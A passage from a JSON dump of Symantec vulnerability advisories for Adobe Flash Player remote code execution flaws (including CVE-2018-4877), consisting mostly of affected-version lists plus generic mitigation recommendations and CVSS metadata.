10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n * Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Google Chrome \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2018-02-06T00:00:00", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4877 Use After Free Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-4877"], "modified": "2018-02-06T00:00:00", "id": "SMNTC-102930", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102930", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:00", "description": "### Description\n\nAdobe Flash Player is prone to an unspecified remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Successful exploitation could potentially allow an attacker to take control of the affected system. Adobe Flash Player version 28.0.0.137 and prior versions are vulnerable.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 